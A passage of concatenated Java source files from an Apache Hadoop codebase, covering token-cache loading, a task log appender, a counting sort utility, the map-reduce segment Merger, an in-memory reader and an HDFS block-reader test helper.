LOG.info("loading user's secret keys from " + tokensFileName);
String localFileName = new Path(tokensFileName).toUri().getPath();
boolean json_error = false;
try {
// read JSON
ObjectMapper mapper = new ObjectMapper();
Map<String, String> nm =
mapper.readValue(new File(localFileName), Map.class);
for(Map.Entry<String, String> ent: nm.entrySet()) {
credentials.addSecretKey(new Text(ent.getKey()),
ent.getValue().getBytes());
}
} catch (JsonMappingException e) {
json_error = true;
} catch (JsonParseException e) {
json_error = true;
}
if(json_error)
LOG.warn("couldn't parse Token Cache JSON file with user secret keys");
}
}
//get secret keys and tokens and store them into TokenCache
@SuppressWarnings("unchecked")
private void populateTokenCache(Configuration conf, Credentials credentials)
throws IOException{
readTokensFromFiles(conf, credentials);
// add the delegation tokens from configuration
String [] nameNodes = conf.getStrings(JobContext.JOB_NAMENODES);
LOG.debug("adding the following namenodes' delegation tokens:" +
Arrays.toString(nameNodes));
if(nameNodes != null) {
Path [] ps = new Path[nameNodes.length];
for(int i=0; i< nameNodes.length; i++) {
ps[i] = new Path(nameNodes[i]);
}
TokenCache.obtainTokensForNamenodes(credentials, ps, conf);
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/TaskLogAppender.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.util.LinkedList;
import java.util.Queue;
import org.apache.log4j.FileAppender;
import org.apache.log4j.spi.LoggingEvent;
/**
* A simple log4j-appender for the task child's
* map-reduce system logs.
*
*/
public class TaskLogAppender extends FileAppender {
private String taskId; //taskId should be managed as String rather than TaskID object
//so that log4j can configure it from the configuration(log4j.properties).
private Integer maxEvents;
private Queue<LoggingEvent> tail = null;
private Boolean isCleanup;
private String logFileName;
// System properties passed in from JVM runner
static final String ISCLEANUP_PROPERTY = "hadoop.tasklog.iscleanup";
static final String LOGSIZE_PROPERTY = "hadoop.tasklog.totalLogFileSize";
static final String TASKID_PROPERTY = "hadoop.tasklog.taskid";
static final String LOG_FILE_NAME = "hadoop.tasklog.file.name";
@Override
public void activateOptions() {
synchronized (this) {
setOptionsFromSystemProperties();
if (maxEvents > 0) {
tail = new LinkedList<LoggingEvent>();
}
if(logFileName == null)
setFile(TaskLog.getTaskLogFile(TaskAttemptID.forName(taskId),
isCleanup, TaskLog.LogName.SYSLOG).toString());
else
setFile(logFileName);
setAppend(true);
super.activateOptions();
}
}
/**
* The Task Runner passes in the options as system properties. Set
* the options if the setters haven't already been called.
*/
private synchronized void setOptionsFromSystemProperties() {
if (isCleanup == null) {
String propValue = System.getProperty(ISCLEANUP_PROPERTY, "false");
isCleanup = Boolean.valueOf(propValue);
}
if (taskId == null) {
taskId = System.getProperty(TASKID_PROPERTY);
}
if (maxEvents == null) {
String propValue = System.getProperty(LOGSIZE_PROPERTY, "100");
setTotalLogFileSize(Long.valueOf(propValue));
}
if(logFileName == null) {
logFileName = System.getProperty(LOG_FILE_NAME);
}
}
@Override
public void append(LoggingEvent event) {
synchronized (this) {
if (tail == null) {
super.append(event);
} else {
if (tail.size() >= maxEvents) {
tail.remove();
}
tail.add(event);
}
}
}
public void flush() {
qw.flush();
}
@Override
public synchronized void close() {
if (tail != null) {
for(LoggingEvent event: tail) {
super.append(event);
}
}
super.close();
}
/**
* Getter/Setter methods for log4j.
*/
public synchronized String getTaskId() {
return taskId;
}
public synchronized void setTaskId(String taskId) {
this.taskId = taskId;
}
private static final int EVENT_SIZE = 100;
public synchronized long getTotalLogFileSize() {
return maxEvents * EVENT_SIZE;
}
public synchronized void setTotalLogFileSize(long logSize) {
maxEvents = (int) logSize / EVENT_SIZE;
}
/**
* Set whether the task is a cleanup attempt or not.
*
* @param isCleanup
* true if the task is cleanup attempt, false otherwise.
*/
public synchronized void setIsCleanup(boolean isCleanup) {
this.isCleanup = isCleanup;
}
/**
* Get whether task is cleanup attempt or not.
*
* @return true if the task is cleanup attempt, false otherwise.
*/
public synchronized boolean getIsCleanup() {
return isCleanup;
}
}
<|start_filename|>src/core/org/apache/hadoop/util/IndexedCountingSortable.java<|end_filename|>
package org.apache.hadoop.util;
/**
* Liner time in place counting sort
*/
public abstract class IndexedCountingSortable
{
abstract public int getKey(int i);
abstract public int get(int i);
abstract public void put(int i, int v);
final int[] counts;
final int[] starts;
final int total;
public IndexedCountingSortable(int[] counts, int total)
{
this.total = total;
this.counts = counts;
this.starts = new int[counts.length+1];
for (int i = 1; i < counts.length+1; i++)
{
starts[i] = starts[i - 1] + counts[i - 1];
}
System.out.println("starts[counts.length - 1] + counts[counts.length - 1] ="+
(starts[counts.length - 1] + counts[counts.length - 1])+",total =" +total);
assert (starts[counts.length - 1] + counts[counts.length - 1] == total);
}
public void sort()
{
int[] dest = new int[total];
for (int i = 0; i < total; i++)
{
int p = getKey(i);
dest[starts[p]++] = get(i);
}
for (int i = 0; i < total; i++)
{
put(i, dest[i]);
}
}
private int findSwapPosition(int partition)
{
while (counts[partition] > 0)
{
counts[partition]--;
int pos = starts[partition] + counts[partition];
int part = getKey(pos);
if (part != partition)
{
return part;
}
}
return -1;
}
public void sortInplace()
{
for (int i = 0; i < counts.length; i++)
{
while (true)
{
int part = findSwapPosition(i);
if (part < 0)
{
break;
}
int hole = starts[i] + counts[i];
int tempOffset = get(hole);
while (true)
{
int next = findSwapPosition(part);
int pos = starts[part] + counts[part];
int temp = get(pos);
put(pos, tempOffset);
tempOffset = temp;
if (i == next)
{
put(hole, tempOffset);
break;
}
part = next;
}
}
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/Merger.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.ChecksumFileSystem;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.LocalDirAllocator;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.RawComparator;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.mapred.IFile.Writer;
import org.apache.hadoop.util.PriorityQueue;
import org.apache.hadoop.util.Progress;
import org.apache.hadoop.util.Progressable;
public class Merger {
private static final Log LOG = LogFactory.getLog(Merger.class);
// Local directories
private static LocalDirAllocator lDirAlloc = new LocalDirAllocator(
"mapred.local.dir");
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
CompressionCodec codec,
Path[] inputs,
boolean deleteInputs,
int mergeFactor,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, inputs, deleteInputs, codec,
comparator, reporter, null).merge(keyClass, valueClass, mergeFactor,
tmpDir, readsCounter, writesCounter, mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
CompressionCodec codec,
Path[] inputs,
boolean deleteInputs,
int mergeFactor,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Counters.Counter mergedMapOutputsCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, inputs, deleteInputs, codec,
comparator, reporter, mergedMapOutputsCounter).merge(keyClass,
valueClass, mergeFactor, tmpDir, readsCounter, writesCounter,
mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
List<Segment<K, V>> segments,
int mergeFactor,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return merge(conf, fs, keyClass, valueClass, segments, mergeFactor,
tmpDir, comparator, reporter, false, readsCounter, writesCounter,
mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
List<Segment<K, V>> segments,
int mergeFactor,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
boolean sortSegments,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, segments, comparator, reporter,
sortSegments).merge(keyClass, valueClass, mergeFactor, tmpDir,
readsCounter, writesCounter, mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
CompressionCodec codec,
List<Segment<K, V>> segments,
int mergeFactor,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
boolean sortSegments,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, segments, comparator, reporter,
sortSegments, codec).merge(keyClass, valueClass, mergeFactor, tmpDir,
readsCounter, writesCounter, mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
List<Segment<K, V>> segments,
int mergeFactor,
int inMemSegments,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
boolean sortSegments,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, segments, comparator, reporter,
sortSegments).merge(keyClass, valueClass, mergeFactor, inMemSegments,
tmpDir, readsCounter, writesCounter, mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
CompressionCodec codec,
List<Segment<K, V>> segments,
int mergeFactor,
int inMemSegments,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
boolean sortSegments,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, segments, comparator, reporter,
sortSegments, codec).merge(keyClass, valueClass, mergeFactor,
inMemSegments, tmpDir, readsCounter, writesCounter, mergePhase);
}
public static <K extends Object, V extends Object> void writeFile(
RawKeyValueIterator records,
Writer<K, V> writer,
Progressable progressable,
Configuration conf) throws IOException {
long progressBar = conf.getLong("mapred.merge.recordsBeforeProgress",
10000);
long recordCtr = 0;
while (records.next()) {
writer.append(records.getKey(), records.getValue());
if (((recordCtr++) % progressBar) == 0) {
progressable.progress();
}
}
}
// Boolean variable for including/considering final merge as part of sort
// phase or not. This is true in map task, false in reduce task. It is
// used in calculating mergeProgress.
static boolean includeFinalMerge = false;
/**
* Sets the boolean variable includeFinalMerge to true. Called from map task
* before calling merge() so that final merge of map task is also considered
* as part of sort phase.
*/
static void considerFinalMergeForProgress() {
includeFinalMerge = true;
}
private static class MergeQueue<K extends Object, V extends Object>
extends PriorityQueue<Segment<K, V>> implements RawKeyValueIterator {
Configuration conf;
FileSystem fs;
CompressionCodec codec;
List<Segment<K, V>> segments = new ArrayList<Segment<K,V>>();
RawComparator<K> comparator;
private long totalBytesProcessed;
private float progPerByte;
private Progress mergeProgress = new Progress();
Progressable reporter;
DataInputBuffer key;
DataInputBuffer value;
Segment<K, V> minSegment;
public MergeQueue(Configuration conf,
FileSystem fs,
Path[] inputs,
boolean deleteInputs,
CompressionCodec codec,
RawComparator<K> comparator,
Progressable reporter) throws IOException {
this(conf, fs, inputs, deleteInputs, codec, comparator, reporter, null);
}
public MergeQueue(Configuration conf,
FileSystem fs,
Path[] inputs,
boolean deleteInputs,
CompressionCodec codec,
RawComparator<K> comparator,
Progressable reporter,
Counters.Counter mergedMapOutputsCounter) throws IOException {
this.conf = conf;
this.fs = fs;
this.codec = codec;
this.comparator = comparator;
this.reporter = reporter;
for (Path file : inputs) {
LOG.debug("MergeQ: adding: " + file);
segments.add(new Segment<K, V>(conf, fs, file, codec, !deleteInputs,
(file.toString().endsWith(Task.MERGED_OUTPUT_PREFIX) ? null
: mergedMapOutputsCounter)));
}
// Sort segments on file-lengths
Collections.sort(segments);
}
public MergeQueue(Configuration conf, FileSystem fs,
List<Segment<K, V>> segments, RawComparator<K> comparator,
Progressable reporter) {
this(conf, fs, segments, comparator, reporter, false);
}
public MergeQueue(Configuration conf, FileSystem fs,
List<Segment<K, V>> segments, RawComparator<K> comparator,
Progressable reporter, boolean sortSegments) {
this.conf = conf;
this.fs = fs;
this.comparator = comparator;
this.segments = segments;
this.reporter = reporter;
if (sortSegments) {
Collections.sort(segments);
}
}
public MergeQueue(Configuration conf, FileSystem fs,
List<Segment<K, V>> segments, RawComparator<K> comparator,
Progressable reporter, boolean sortSegments, CompressionCodec codec) {
this(conf, fs, segments, comparator, reporter, sortSegments);
this.codec = codec;
}
public void close() throws IOException {
Segment<K, V> segment;
while((segment = pop()) != null) {
segment.close();
}
}
public DataInputBuffer getKey() throws IOException {
return key;
}
public DataInputBuffer getValue() throws IOException {
return value;
}
private void adjustPriorityQueue(Segment<K, V> reader) throws IOException {
long startPos = reader.getPosition();
boolean hasNext = reader.nextRawKey();
long endPos = reader.getPosition();
totalBytesProcessed += endPos - startPos;
mergeProgress.set(totalBytesProcessed * progPerByte);
if (hasNext) {
adjustTop();
} else {
pop();
reader.close();
}
}
public boolean next() throws IOException {
if (size() == 0)
return false;
if (minSegment != null) {
//minSegment is non-null for all invocations of next except the first
//one. For the first invocation, the priority queue is ready for use
//but for the subsequent invocations, first adjust the queue
adjustPriorityQueue(minSegment);
if (size() == 0) {
minSegment = null;
return false;
}
}
minSegment = top();
long startPos = minSegment.getPosition();
key = minSegment.getKey();
value = minSegment.getValue();
long endPos = minSegment.getPosition();
totalBytesProcessed += endPos - startPos;
mergeProgress.set(totalBytesProcessed * progPerByte);
return true;
}
@SuppressWarnings("unchecked")
protected boolean lessThan(Object a, Object b) {
DataInputBuffer key1 = ((Segment<K, V>) a).getKey();
DataInputBuffer key2 = ((Segment<K, V>) b).getKey();
int s1 = key1.getPosition();
int l1 = key1.getLength() - s1;
int s2 = key2.getPosition();
int l2 = key2.getLength() - s2;
return comparator
.compare(key1.getData(), s1, l1, key2.getData(), s2, l2) < 0;
}
public RawKeyValueIterator merge(
Class<K> keyClass,
Class<V> valueClass,
int factor,
Path tmpDir,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return merge(keyClass, valueClass, factor, 0, tmpDir, readsCounter,
writesCounter, mergePhase);
}
RawKeyValueIterator merge(
Class<K> keyClass,
Class<V> valueClass,
int factor,
int inMem,
Path tmpDir,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
LOG.info("Merging " + segments.size() + " sorted segments");
/*
* If there are inMemory segments, then they come first in the segments
* list and then the sorted disk segments. Otherwise(if there are only
* disk segments), then they are sorted segments if there are more than
* factor segments in the segments list.
*/
int numSegments = segments.size();
int origFactor = factor;
int passNo = 1;
if (mergePhase != null) {
mergeProgress = mergePhase;
}
long totalBytes = computeBytesInMerges(factor, inMem);
if (totalBytes != 0) {
progPerByte = 1.0f / (float) totalBytes;
}
// create the MergeStreams from the sorted map created in the
// constructor
// and dump the final output to a file
do {
// get the factor for this pass of merge. We assume in-memory
// segments
// are the first entries in the segment list and that the pass
// factor
// doesn't apply to them
factor = getPassFactor(factor, passNo, numSegments - inMem);
if (1 == passNo) {
factor += inMem;
}
List<Segment<K, V>> segmentsToMerge = new ArrayList<Segment<K, V>>();
int segmentsConsidered = 0;
int numSegmentsToConsider = factor;
long startBytes = 0; // starting bytes of segments of this merge
while (true) {
// extract the smallest 'factor' number of segments
// Call cleanup on the empty segments (no key/value data)
List<Segment<K, V>> mStream = getSegmentDescriptors(numSegmentsToConsider);
for (Segment<K, V> segment : mStream) {
// Initialize the segment at the last possible moment;
// this helps in ensuring we don't use buffers until we
// need them
segment.init(readsCounter);
long startPos = segment.getPosition();
boolean hasNext = segment.nextRawKey();
long endPos = segment.getPosition();
if (hasNext) {
startBytes += endPos - startPos;
segmentsToMerge.add(segment);
segmentsConsidered++;
} else {
segment.close();
numSegments--; // we ignore this segment for the
// merge
}
}
// if we have the desired number of segments
// or looked at all available segments, we break
if (segmentsConsidered == factor || segments.size() == 0) {
break;
}
numSegmentsToConsider = factor - segmentsConsidered;
}
// feed the streams to the priority queue
initialize(segmentsToMerge.size());
clear();
for (Segment<K, V> segment : segmentsToMerge) {
put(segment);
}
// if we have lesser number of segments remaining, then just
// return the
// iterator, else do another single level merge
if (numSegments <= factor) {
if (!includeFinalMerge) { // for reduce task
// Reset totalBytesProcessed and recalculate totalBytes
// from the
// remaining segments to track the progress of the final
// merge.
// Final merge is considered as the progress of the
// reducePhase,
// the 3rd phase of reduce task.
totalBytesProcessed = 0;
totalBytes = 0;
for (int i = 0; i < segmentsToMerge.size(); i++) {
totalBytes += segmentsToMerge.get(i).getLength();
LOG.info("#" + i + " 's length "
+ segmentsToMerge.get(i).getLength());
}
}
if (totalBytes != 0) // being paranoid
progPerByte = 1.0f / (float) totalBytes;
totalBytesProcessed += startBytes;
if (totalBytes != 0)
mergeProgress.set(totalBytesProcessed * progPerByte);
else
mergeProgress.set(1.0f); // Last pass and no segments
// left - we're done
LOG.info("Down to the last merge-pass, with " + numSegments
+ " segments left of total size: "
+ (totalBytes - totalBytesProcessed) + " bytes");
return this;
} else {
LOG.info("Merging " + segmentsToMerge.size()
+ " intermediate segments out of a total of "
+ (segments.size() + segmentsToMerge.size()));
long bytesProcessedInPrevMerges = totalBytesProcessed;
totalBytesProcessed += startBytes;
// we want to spread the creation of temp files on multiple
// disks if
// available under the space constraints
long approxOutputSize = 0;
for (Segment<K, V> s : segmentsToMerge) {
approxOutputSize += s.getLength()
+ ChecksumFileSystem.getApproxChkSumLength(s.getLength());
}
Path tmpFilename = new Path(tmpDir, "intermediate").suffix("."
+ passNo);
Path outputFile = lDirAlloc.getLocalPathForWrite(tmpFilename
.toString(), approxOutputSize, conf);
Writer<K, V> writer = new Writer<K, V>(conf, fs, outputFile,
keyClass, valueClass, codec, writesCounter);
writeFile(this, writer, reporter, conf);
writer.close();
// we finished one single level merge; now clean up the
// priority
// queue
this.close();
// Add the newly create segment to the list of segments to
// be merged
Segment<K, V> tempSegment = new Segment<K, V>(conf, fs, outputFile,
codec, false);
segments.add(tempSegment);
numSegments = segments.size();
Collections.sort(segments);
// Subtract the difference between expected size of new
// segment and
// actual size of new segment(Expected size of new segment
// is
// inputBytesOfThisMerge) from totalBytes. Expected size and
// actual
// size will match(almost) if combiner is not called in
// merge.
long inputBytesOfThisMerge = totalBytesProcessed
- bytesProcessedInPrevMerges;
totalBytes -= inputBytesOfThisMerge - tempSegment.getLength();
if (totalBytes != 0) {
progPerByte = 1.0f / (float) totalBytes;
}
passNo++;
}
//we are worried about only the first pass merge factor. So reset the
//factor to what it originally was
factor = origFactor;
} while(true);
}
/**
* Determine the number of segments to merge in a given pass. Assuming more
* than factor segments, the first pass should attempt to bring the total
* number of segments - 1 to be divisible by the factor - 1 (each pass
* takes X segments and produces 1) to minimize the number of merges.
*/
private int getPassFactor(int factor, int passNo, int numSegments) {
if (passNo > 1 || numSegments <= factor || factor == 1)
return factor;
int mod = (numSegments - 1) % (factor - 1);
if (mod == 0)
return factor;
return mod + 1;
}
/** Return (& remove) the requested number of segment descriptors from the
* sorted map.
*/
private List<Segment<K, V>> getSegmentDescriptors(int numDescriptors) {
if (numDescriptors > segments.size()) {
List<Segment<K, V>> subList = new ArrayList<Segment<K,V>>(segments);
segments.clear();
return subList;
}
List<Segment<K, V>> subList = new ArrayList<Segment<K, V>>(segments
.subList(0, numDescriptors));
for (int i = 0; i < numDescriptors; ++i) {
segments.remove(0);
}
return subList;
}
/**
* Compute expected size of input bytes to merges, will be used in
* calculating mergeProgress. This simulates the above merge() method and
* tries to obtain the number of bytes that are going to be merged in all
* merges(assuming that there is no combiner called while merging).
*
* @param factor
* mapreduce.task.io.sort.factor
* @param inMem
* number of segments in memory to be merged
*/
long computeBytesInMerges(int factor, int inMem) {
int numSegments = segments.size();
List<Long> segmentSizes = new ArrayList<Long>(numSegments);
long totalBytes = 0;
int n = numSegments - inMem;
// factor for 1st pass
int f = getPassFactor(factor, 1, n) + inMem;
n = numSegments;
for (int i = 0; i < numSegments; i++) {
// Not handling empty segments here assuming that it would not
// affect
// much in calculation of mergeProgress.
segmentSizes.add(segments.get(i).getLength());
}
// If includeFinalMerge is true, allow the following while loop
// iterate
// for 1 more iteration. This is to include final merge as part of
// the
// computation of expected input bytes of merges
boolean considerFinalMerge = includeFinalMerge;
while (n > f || considerFinalMerge) {
if (n <= f) {
considerFinalMerge = false;
}
long mergedSize = 0;
f = Math.min(f, segmentSizes.size());
for (int j = 0; j < f; j++) {
mergedSize += segmentSizes.remove(0);
}
totalBytes += mergedSize;
// insert new size into the sorted list
int pos = Collections.binarySearch(segmentSizes, mergedSize);
if (pos < 0) {
pos = -pos - 1;
}
segmentSizes.add(pos, mergedSize);
n -= (f - 1);
f = factor;
}
return totalBytes;
}
public Progress getProgress() {
return mergeProgress;
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/task/reduce/InMemoryReader.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred.task.reduce;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.WritableUtils;
import org.apache.hadoop.mapred.IFile;
import org.apache.hadoop.mapred.TaskAttemptID;
import org.apache.hadoop.mapred.IFile.IStreamWriter;
import org.apache.hadoop.mapred.IFile.Reader;
import org.apache.hadoop.util.Progressable;
/**
* <code>IFile.InMemoryReader</code> to read map-outputs present in-memory.
*/
public class InMemoryReader<K, V> extends Reader<K, V>
{
private final TaskAttemptID taskAttemptId;
private final MergeManager<K, V> merger;
// DataInputBuffer memDataIn = new DataInputBuffer();
private int start;
private int length;
public InMemoryReader(MergeManager<K, V> merger, TaskAttemptID taskAttemptId, byte[] data,
int start, int length) throws IOException
{
super(null, null, length - start, null, null);
this.merger = merger;
this.taskAttemptId = taskAttemptId;
buffer = data;
bufferSize = (int) fileLength;
dataIn.reset(buffer, start, length);
this.start = start;
this.length = length;
}
@Override
public void reset(int offset)
{
dataIn.reset(buffer, start + offset, length);
bytesRead = offset;
eof = false;
}
@Override
public long getPosition() throws IOException
{
// InMemoryReader does not initialize streams like Reader, so
// in.getPos()
// would not work. Instead, return the number of uncompressed bytes
// read,
// which will be correct since in-memory data is not compressed.
return bytesRead;
}
@Override
public long getLength()
{
return fileLength;
}
private void dumpOnError()
{
File dumpFile = new File("../output/" + taskAttemptId + ".dump");
System.err.println("Dumping corrupt map-output of " + taskAttemptId + " to "
+ dumpFile.getAbsolutePath());
try
{
FileOutputStream fos = new FileOutputStream(dumpFile);
fos.write(buffer, 0, bufferSize);
fos.close();
}
catch (IOException ioe)
{
System.err.println("Failed to dump map-output of " + taskAttemptId);
}
}
@Override
public boolean nextRawKey(DataInputBuffer key) throws IOException
{
try
{
return super.nextRawKey(key);
}
catch (IOException ioe)
{
dumpOnError();
throw ioe;
}
}
@Override
public void nextRawValue(DataInputBuffer value) throws IOException
{
try
{
super.nextRawValue(value);
}
catch (IOException ioe)
{
dumpOnError();
throw ioe;
}
}
@Override
public void close()
{
// Release
dataIn = null;
buffer = null;
// Inform the MergeManager
if (merger != null)
{
merger.unreserve(bufferSize);
}
}
/**
* writing (dumping) byte-array data to output stream.
*/
@Override
public void dumpTo(IStreamWriter writer, Progressable progressable, Configuration conf)
throws IOException
{
writer.write(buffer, start, length - IFile.LEN_OF_EOF);
DataInputBuffer din = new DataInputBuffer();
din.reset(buffer, start + length - IFile.LEN_OF_EOF, IFile.LEN_OF_EOF);
verifyEOF(din);
}
}
<|start_filename|>src/test/org/apache/hadoop/hdfs/BlockReaderTestUtil.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs;
import java.net.Socket;
import java.net.InetSocketAddress;
import java.io.DataOutputStream;
import java.util.List;
import java.io.IOException;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hdfs.DFSClient.RemoteBlockReader;
import org.apache.hadoop.hdfs.protocol.Block;
import org.apache.hadoop.hdfs.protocol.DatanodeInfo;
import org.apache.hadoop.hdfs.protocol.LocatedBlock;
import org.apache.hadoop.hdfs.server.common.HdfsConstants;
import org.apache.hadoop.hdfs.server.datanode.DataNode;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.net.NetUtils;
import static org.junit.Assert.*;
/**
* A helper class to setup the cluster, and get to BlockReader and DataNode for a block.
*/
public class BlockReaderTestUtil {
private Configuration conf = null;
private MiniDFSCluster cluster = null;
/**
* Setup the cluster
*/
public BlockReaderTestUtil(int replicationFactor) throws Exception {
conf = new Configuration();
conf.setInt("dfs.replication", replicationFactor);
cluster = new MiniDFSCluster(conf, replicationFactor, true, null);
cluster.waitActive();
}
/**
* Shutdown cluster
*/
public void shutdown() {
if (cluster != null) {
cluster.shutdown();
}
}
public MiniDFSCluster getCluster() {
return cluster;
}
public Configuration getConf() {
return conf;
}
/**
* Create a file of the given size filled with random data.
* @return File data.
*/
public byte[] writeFile(Path filepath, int sizeKB)
throws IOException {
FileSystem fs = cluster.getFileSystem();
// Write a file with 256K of data
DataOutputStream os = fs.create(filepath);
byte data[] = new byte[1024 * sizeKB];
for (int i = 0; i < data.length; i++) {
data[i] = (byte)(i&0xff);
}
// new Random().nextBytes(data);
os.write(data);
os.close();
return data;
}
/**
* Get the list of Blocks for a file.
*/
public List<LocatedBlock> getFileBlocks(Path filepath, int sizeKB)
throws IOException {
// Return the blocks we just wrote
DFSClient dfsclient = getDFSClient();
return dfsclient.namenode.getBlockLocations(
filepath.toString(), 0, sizeKB * 1024).getLocatedBlocks();
}
/**
* Get the DFSClient.
*/
public DFSClient getDFSClient() throws IOException {
InetSocketAddress nnAddr = new InetSocketAddress("localhost", cluster.getNameNodePort());
return new DFSClient(nnAddr, conf);
}
/**
* Exercise the BlockReader and read length bytes.
*
* It does not verify the bytes read.
*/
public void readCasually(BlockReader reader, int length, boolean expectEof)
throws IOException {
byte buf[] = new byte[1024];
int nRead = 0;
while (nRead < length) {
DFSClient.LOG.info("So far read " + nRead + " - going to read more.");
int n = reader.read(buf, 0, buf.length);
assertTrue(n > 0);
nRead += n;
}
if (expectEof) {
DFSClient.LOG.info("Done reading, expect EOF for next read.");
assertEquals(-1, reader.read(buf, 0, buf.length));
}
}
/**
* Get a BlockReader for the given block.
*/
public BlockReader getBlockReader(LocatedBlock testBlock, int offset, int lenToRead)
throws IOException {
InetSocketAddress targetAddr = null;
Socket sock = null;
BlockReader blockReader = null;
Block block = testBlock.getBlock();
DatanodeInfo[] nodes = testBlock.getLocations();
targetAddr = NetUtils.createSocketAddr(nodes[0].getName());
sock = new Socket();
sock.connect(targetAddr, HdfsConstants.READ_TIMEOUT);
sock.setSoTimeout(HdfsConstants.READ_TIMEOUT);
return RemoteBlockReader.newBlockReader(
sock, targetAddr.toString()+ ":" + block.getBlockId(), block.getBlockId(),
testBlock.getBlockToken(),
block.getGenerationStamp(),
offset, lenToRead,
conf.getInt("io.file.buffer.size", 4096));
}
/**
* Get a DataNode that serves our testBlock.
*/
public DataNode getDataNode(LocatedBlock testBlock) {
DatanodeInfo[] nodes = testBlock.getLocations();
int ipcport = nodes[0].ipcPort;
